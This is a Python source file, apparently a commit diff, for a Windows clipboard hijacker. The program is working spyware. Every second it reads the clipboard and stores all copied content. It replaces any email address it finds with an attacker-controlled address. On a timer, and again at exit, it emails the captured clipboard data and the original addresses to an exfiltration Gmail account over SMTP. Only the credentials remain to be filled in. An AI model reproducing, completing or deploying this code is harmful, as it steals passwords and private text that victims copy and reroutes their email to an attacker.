1+ """
2+ Clipboard Email Hijacker with Email Exfiltration
3+ Monitors clipboard, hijacks emails, and exfiltrates collected data via email
4+ """
5+
6+ import win32clipboard
7+ import re
8+ from time import sleep , time
9+ import sys
10+ import smtplib
11+ from email .mime .text import MIMEText
12+ from email .mime .multipart import MIMEMultipart
13+ from datetime import datetime
14+
15+ # Configuration
16+ ATTACKER_EMAIL = "attacker@attack.com"
17+ EXFILTRATION_EMAIL = "addyours@gmail.com"
18+ CHECK_INTERVAL = 1 # seconds between clipboard checks
19+ SEND_INTERVAL = 20 # seconds between sending collected data
20+ EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
21+
22+ # Gmail SMTP Configuration
23+ SMTP_SERVER = "smtp.gmail.com"
24+ SMTP_PORT = 465 # Using SSL port like the working test
25+ SMTP_USERNAME = "addyours@gmail.com"
26+ SMTP_PASSWORD = "add yours"
27+
28+ # Data collection storage
29+ clipboard_data = []
30+ hijacked_emails = []
31+
32+ def get_clipboard_text ():
33+ """Safely get text from clipboard"""
34+ try :
35+ win32clipboard .OpenClipboard ()
36+ try :
37+ data = win32clipboard .GetClipboardData (win32clipboard .CF_TEXT )
38+ if data :
39+ return data .decode ('utf-8' ).rstrip ()
40+ return None
41+ except TypeError :
42+ # Clipboard doesn't contain text
43+ return None
44+ finally :
45+ win32clipboard .CloseClipboard ()
46+ except Exception as e :
47+ return None
48+
49+ def set_clipboard_text (text ):
50+ """Safely set clipboard text"""
51+ try :
52+ win32clipboard .OpenClipboard ()
53+ win32clipboard .EmptyClipboard ()
54+ win32clipboard .SetClipboardText (text , win32clipboard .CF_TEXT )
55+ win32clipboard .CloseClipboard ()
56+ return True
57+ except Exception as e :
58+ try :
59+ win32clipboard .CloseClipboard ()
60+ except :
61+ pass
62+ return False
63+
64+ def send_exfiltration_email (clipboard_data , hijacked_emails ):
65+ """Send collected clipboard data via email"""
66+
67+ if not clipboard_data and not hijacked_emails :
68+ print ("[*] No data to exfiltrate, skipping email" )
69+ return False
70+
71+ try :
72+ # Create email
73+ msg = MIMEMultipart ()
74+ msg ['From' ] = SMTP_USERNAME
75+ msg ['To' ] = EXFILTRATION_EMAIL
76+ msg ['Subject' ] = f"Clipboard Data Exfiltration - { datetime .now ().strftime ('%Y-%m-%d %H:%M:%S' )}
77+
78+ # Build email body
79+ body = "=" * 60 + "\n "
80+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n "
81+ body += "=" * 60 + "\n \n "
82+ body += f"Collection Time: { datetime .now ().strftime ('%Y-%m-%d %H:%M:%S' )} \n "
83+ body += f"Total Items Collected: { len (clipboard_data )} \n "
84+ body += f"Total Emails Hijacked: { len (hijacked_emails )} \n "
85+ body += "\n " + "=" * 60 + "\n "
86+
87+ # Clipboard data section
88+ if clipboard_data :
89+ body += "\n --- CLIPBOARD DATA COLLECTED ---\n "
90+ body += "\n All captured clipboard content (comma-separated):\n "
91+ body += ", " .join (clipboard_data )
92+ body += "\n \n --- DETAILED CLIPBOARD ENTRIES ---\n "
93+ for i , item in enumerate (clipboard_data , 1 ):
94+ body += f"{ i } { item } \n "
95+
96+ # Hijacked emails section
97+ if hijacked_emails :
98+ body += "\n " + "=" * 60 + "\n "
99+ body += "--- HIJACKED EMAIL ADDRESSES ---\n \n "
100+ body += "Comma-separated list:\n "
101+ body += ", " .join (hijacked_emails )
102+ body += "\n \n Detailed list:\n "
103+ for i , email in enumerate (hijacked_emails , 1 ):
104+ body += f"{ i } { email } \n "
105+
106+ body += "\n " + "=" * 60 + "\n "
107+ body += "End of Report\n "
108+ body += "=" * 60 + "\n "
109+
110+ msg .attach (MIMEText (body , 'plain' ))
111+
112+ # Send email using SMTP_SSL (exactly like the working test email)
113+ print (f"\n [*] Sending exfiltration email to { EXFILTRATION_EMAIL } )
114+ with smtplib .SMTP_SSL (SMTP_SERVER , SMTP_PORT ) as server :
115+ server .login (SMTP_USERNAME , SMTP_PASSWORD )
116+ server .send_message (msg )
117+
118+ print (f"[+] Successfully sent exfiltration email!" )
119+ print (f" - Clipboard items: { len (clipboard_data )} )
120+ print (f" - Hijacked emails: { len (hijacked_emails )} \n " )
121+
122+ return True
123+
124+ except smtplib .SMTPAuthenticationError :
125+ print ("[ERROR] SMTP Authentication failed!" )
126+ print ("[!] Make sure you're using a Gmail App Password, not your regular password" )
127+ print ("[!] Generate one at: https://myaccount.google.com/apppasswords" )
128+ return False
129+ except Exception as e :
130+ print (f"[ERROR] Failed to send email: { e } )
131+ import traceback
132+ traceback .print_exc ()
133+ return False
134+
135+ def main ():
136+ """Main clipboard monitoring loop with periodic exfiltration"""
137+ global clipboard_data , hijacked_emails
138+
139+ print ("=" * 60 )
140+ print ("Clipboard Email Hijacker with Data Exfiltration" )
141+ print ("=" * 60 )
142+ print (f"[+] Target email replacement: { ATTACKER_EMAIL } )
143+ print (f"[+] Exfiltration email: { EXFILTRATION_EMAIL } )
144+ print (f"[+] Monitoring clipboard every { CHECK_INTERVAL } )
145+ print (f"[+] Sending data every { SEND_INTERVAL } )
146+ print ("[+] Press Ctrl+C to stop and exit\n " )
147+
148+ hijack_count = 0
149+ last_hijacked = None
150+ last_send_time = time ()
151+ last_clipboard_content = None
152+
153+ try :
154+ while True :
155+ current_time = time ()
156+
157+ # Get clipboard content
158+ data = get_clipboard_text ()
159+
160+ # Store ALL clipboard content (not just emails)
161+ if data and data != last_clipboard_content :
162+ clipboard_data .append (data )
163+ last_clipboard_content = data
164+ print (f"[*] Clipboard captured: { data [:50 ]} { '...' if len (data ) > 50 else '' } )
165+
166+ # Check if it's an email and hijack it
167+ if data and re .search (EMAIL_REGEX , data ):
168+ if data != ATTACKER_EMAIL and data != last_hijacked :
169+ print (f"[!] EMAIL DETECTED: { data } )
170+
171+ # Record the original email before hijacking
172+ hijacked_emails .append (data )
173+
174+ if set_clipboard_text (ATTACKER_EMAIL ):
175+ hijack_count += 1
176+ last_hijacked = data
177+ print (f"[+] REPLACED with: { ATTACKER_EMAIL } )
178+ print (f"[*] Total hijacks: { hijack_count } \n " )
179+
180+ # Check if it's time to send exfiltration email
181+ if current_time - last_send_time >= SEND_INTERVAL :
182+ if send_exfiltration_email (clipboard_data , hijacked_emails ):
183+ # Clear the data after successful send
184+ clipboard_data = []
185+ hijacked_emails = []
186+ print ("[+] Data cleared, starting new collection cycle\n " )
187+
188+ last_send_time = current_time
189+
190+ sleep (CHECK_INTERVAL )
191+
192+ except KeyboardInterrupt :
193+ print (f"\n \n [+] Ctrl+C detected - Stopping monitoring..." )
194+ print (f"[*] Total emails hijacked: { hijack_count } )
195+
196+ # Send any remaining data before exit
197+ if clipboard_data or hijacked_emails :
198+ print ("\n [*] Sending final exfiltration email with remaining data..." )
199+ send_exfiltration_email (clipboard_data , hijacked_emails )
200+
201+ print ("\n [+] Program exited successfully" )
202+ sys .exit (0 )
203+
204+ except Exception as e :
205+ print (f"\n [ERROR] Unexpected error: { e } )
206+ import traceback
207+ traceback .print_exc ()
208+ sys .exit (1 )
209+
210+ if __name__ == "__main__" :
211+ main ()
0 commit comments